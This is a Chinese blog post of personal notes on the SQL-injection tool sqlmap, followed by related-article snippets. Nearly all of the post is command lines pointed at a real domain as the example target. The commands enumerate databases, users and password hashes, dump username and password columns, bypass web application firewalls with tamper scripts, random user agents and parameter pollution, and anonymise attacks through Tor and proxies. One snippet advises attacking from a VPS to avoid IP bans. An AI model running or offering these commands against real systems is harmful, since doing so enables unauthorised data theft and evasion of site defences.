SQLmap笔记

最新推荐文章于 2024-04-18 13:10:32 发布
置顶 最新推荐文章于 2024-04-18 13:10:32 发布
阅读量419 收藏 1
点赞数 1
分类专栏: web安全 文章标签: sqlmap web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41514928/article/details/83108263
版权

SQLmap笔记


sqlmap -u http://www.baidu.com/news_show.aspx?id=97 检测注入点是否可用 



sqlmap -u http://www.baidu.com/news_show.aspx?id=97 --tables 列出当前web数据库所有表名

nmap --script=vuln     漏洞扫描脚本

sqlmap -u    注入点   检测注入点是否可用

sqlmap -u    注入点   --dbs  

sqlmap -u   注入点  --batch   自动输入

暴库


Web当前使用的数据库
sqlmap -u    注入点   --current-db



Web数据库使用的账户
sqlmap -u    注入点   --current-user

列出sqlserver所有用户
sqlmap -u    注入点   --users

  




列出表中字段 


sqlmap -u    注入点   --passwords

列出数据库中的表

sqlmap -u    注入点   -D tourdata  --tables (-D指定数据库名称)

sqlmap -u注入点-D  tourdata -T  userb  -C “email,username,userpassword”  --dump  (将结果导出) 

sqlmap -u    注入点   -D  tourdata -T  userb  --columns

爆字段内容
指定导出特定范围字段内容

sqlmap -u    “注入点”   --cookie “id=97” --level 2 

sqlmap -u注入点-D  tourdata -T  userb  -C “email,username,userpassword”--start 1 --stop 10  --dump  (1,10行数)

Cookie注入


sqlmap -u    “注入点”  --table --cookie “id=97” --level 2

python sqlmap.py  -u  “注入点”  -f --banner  --dbs  --users  

sqlmap -u    “注入点” --columns -T “user”  --cookie “id=97” --level 2

sqlmap -u    “注入点” --dump  -C “username,password”--columns -T “user”  --cookie “id=97” --level 2

可对以上参数进行结合使用



绕过防火墙注入

确认是否开了WAF

Sqlmap -u  “注入点”  --delay=3.5  --time-sec=60  

Sqlmap  -u  “注入点”  --thread  10  --identify-waf  (首选)

sqlmap  -u  “注入点” --thread 10  --check-waf  备选

使用参数绕过

Sqlmap -u  “注入点” --random-agent -v 2   (浏览器绕过)

Sqlmap -u  “注入点”  --hpp  -v 3  (参数污染绕过)

sqlmap  -u  “注入点” --mobile  对移动端的服务器进行注入 

Sqlmap  -u  “注入点” --proxy=211.211.211.211.8080  --proxy-cred=211.:985 代理注入

sqlmap  -u  “注入点” --ignore-proxy  禁止用代理注入,直接注入

sqlmap  -u  “注入点”  --flush-session  清空会话,重构注入

sqlmap  -u  “注入点” -hex  或者--no-cast  进行字符码转换


sqlmap  -u  “注入点” --tor  匿名注入


脚本注入的格式

sqlmap  -u  “注入点” --tamper=A.py,B.py  A,B是脚本 











将payload进行URL编码注入




sqlmap  -r 1.txt --tamper=charencode

 

「已注销」
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLmap学习笔记
weixin_43988774的博客
03-23 3733
sqlmap所有参数的学习笔记
SQL笔记
hushanpa的专栏
04-02 315
数据库的层次结构:目录名-模式名-表名 模式 创建模式 CREATE SCHEMA Teaching_db  AUTHORIZATION Hang; 删除模式 DROP SCHEMA Teaching_db  CASCADE;   表 创建表 CREATE    TABLE       Student          (sno           NUMBERIC(6),
Sqlmap工具使用笔记
weixin_51339377的博客
04-07 4691
pip install sqlmap SQLmap建议使用kali版本的 不建议使用windows版本 攻击的时候建议使用vps去攻击 否则本地ip会很快被封 sqlmap sqlmap -u "目标网址" --dbs sqlmap -u "目标网址" -D [数据库名] --tables sqlmap -u "目标网址" -D [数据库名] -T [表名] --columns sqlmap -u "目标网址" -D [数据库名] -T [表名] -C [列名] --dump...
sqlmap常用操作
热门推荐
Shanfenglan's blog
08-21 26万+
声明 很久以前收集的,最近有研究sql注入的想法,所以贴出以备不时之需。 具体参数翻译 –version 显示程序的版本号并退出 -h, –help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为 1) Target(目标): 以下至少需要设置其中一个选项,设置目标 URL。 -d DIRECT 直接连接到数据库。 -u URL, –url=URL 目标 URL。 -l LIST 从 Burp 或 WebScarab 代理的日志中解析目标。 -r REQUESTFILE 从一个文件中
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了_sqlmap使用教程
最新发布
2401_84264244的博客
04-18 404
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
SQLmap工具使用教程
weixin_62528361的博客
09-14 1405
sql注入入门教程
有关sqlmap的使用
Mike_Roger的博客
01-24 659
首先贴一段详细参数说明,相当于说明书了 sqlmap详细命令: -is-dba 当前用户权限(是否为root权限) -dbs 所有数据库 -current-db 网站当前数据库 -users 所有数据库用户 -current-user 当前数据库用户 -random-agent 构造随机user-agent -passwords 数据库密码
Sqlmap讲解
山兔的博客
08-01 1074
SQL注入测试方法: 1.手工测试 优点:测试方法灵活 缺点:效率低、范围窄、因测试者技术水平而异 2.工具测试 优点:自动化、效率高、范围广 缺点:误报、漏报、测试方法有限 SQLMAP简介 sqlmap是一个开源的渗透测试工具,可以用来进自动化检测、利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执操作系统命令 官方地址:https://sqlmap.org/
sqlmap笔记.md
08-18
sqlmap笔记
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP 的使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
SQLMAP渗透笔记
04-25
SQLMAP渗透笔记
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
SqlMap的使用
06-24
本文档详细介绍了SqlMap的使用教程,SQL注入攻击是黑客对数据库进攻击的常用手段之一
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记,使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
sqlmap最全笔记及实验过程
04-25
sqlmap使用秘籍笔记大全 sqlmap是开源的自动化SQL注入工具,旨在检测和利用SQL注入漏洞。下面是sqlmap的详细使用秘籍笔记大全。 版本查看 Sqlmap --version:查看sqlmap的版本信息。 Sqlmap使用秘籍 Sqlmap支持...
sqlmap检索DBMS信息
weixin_45735361的博客
02-15 828
sqlmap检索DBMS信息 sqlmap检索DBMS banner 获取后端数据库banner信息 参数 --banner或者-b 这个在我们进前面内容学习时就已经使用到了很多 sqlmap检索DBMS当前数据库 获取当前数据库名 参数 --current-db sqlmap检索DBMS当前主机名 获取主机名 参数 --hostname sqlmap检索DBMS用户信息 sqlmap探测...
SQLmap数据库注入攻击
The Road Of Sec
09-16 1240
指令: sqlmap -u url    扫描注入点扫描目标主机。(url前提是存在漏洞) sqlmap -u url  --users 获取到用户名 sqlmap -u url  --dbs 爆出该sqlserver中所有数据库名称 sqlmap -u url  --current -db  爆出当前web使用的数据库 sqlmap -u url  --current -u
sqlmap的基本命令使用
Leonardo DiCaprio‘s spring
03-24 5万+
本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下; cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                 sqlmap.py -u 登
2018-10 SQLMAP工具的一些参数记录
昨天今天下雨天的博客
10-29 691
查看所有参数:sqlmap -hh 查看目标系统信息:--banner   举例语句:sqlmap -r /root/test --banner 指定爆破参数:-p 爆破库列表:--dbs 爆破当前使用的库:--current-db 爆破表:--tables 爆破字段:--columns 爆破字段值:--dump   查看服务端用户名:--users    举例语句:sqlma...
使用SQLmap检测SQL注入:DVWA实战教程
“通过sqlnamp检测sql注入漏洞的随堂笔记,包括安装SQLmap和DVWA,以及SQL注入的概述和SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段中插入恶意SQL代码,来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值